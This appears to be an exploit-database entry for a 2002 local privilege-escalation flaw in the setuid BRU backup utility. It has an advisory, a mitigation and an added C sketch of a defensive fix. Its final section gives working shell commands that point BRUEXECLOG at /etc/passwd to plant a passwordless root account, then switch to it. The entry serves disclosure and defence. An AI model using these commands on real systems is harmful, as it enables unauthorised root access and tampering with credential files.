vendor: BRU, the Backup and Restore Utility
by: SecurityFocus
CVSS: 7.2 HIGH
Privilege Escalation
CWE: 264
Product Name: BRU, the Backup and Restore Utility
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

BRU, the Backup and Restore Utility Vulnerability

A vulnerability exists in BRU, the Backup and Restore Utility, from Enhanced Software Technologies. By setting the value of the BRUEXECLOG environment variable, it is possible for an attacker to alter and create files on the filesystem. As BRU is installed setuid, these files are owned by root. This vulnerability can be easily used by local users to obtain root privileges.

Mitigation:

Ensure that the BRUEXECLOG environment variable is not set.
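
The flaw described above is a setuid program opening a log path taken from the caller's environment with root's rights. The C sketch below is an added example (not BRU's code and not part of the original advisory) of how a privileged program can ignore such a variable when it runs with elevated IDs; `DEFAULT_LOG` and the function names are assumptions.

```c
/* Added illustration, not BRU source code. BRUEXECLOG is the variable named
 * in the advisory; DEFAULT_LOG and both function names are hypothetical. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DEFAULT_LOG "/var/log/bruexeclog" /* assumed fixed, root-owned path */

/* Decide which log path to use. If the real and effective IDs differ, the
 * process is running setuid/setgid and the environment belongs to the
 * caller, so the variable is ignored. Relative paths are rejected too. */
const char *pick_log_path(const char *env_value, uid_t ruid, uid_t euid,
                          gid_t rgid, gid_t egid)
{
    int elevated = (ruid != euid) || (rgid != egid);

    if (elevated || env_value == NULL || env_value[0] != '/')
        return DEFAULT_LOG;
    return env_value;
}

/* Open the log for appending. O_NOFOLLOW refuses a symlink as the final
 * path component, and mode 0600 keeps a newly created log private. */
int open_exec_log(void)
{
    const char *path = pick_log_path(getenv("BRUEXECLOG"), getuid(),
                                     geteuid(), getgid(), getegid());

    return open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
}

int main(void)
{
    /* Constructed inputs: uid 1000 invoking a setuid-root binary. */
    printf("setuid run -> %s\n",
           pick_log_path("/etc/passwd", 1000, 0, 100, 100));
    printf("normal run -> %s\n",
           pick_log_path("/tmp/bru.log", 1000, 1000, 100, 100));
    return 0;
}
```

On glibc, `secure_getenv()` applies the same rule by returning NULL when the process runs in secure-execution mode.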
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1321/info

$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#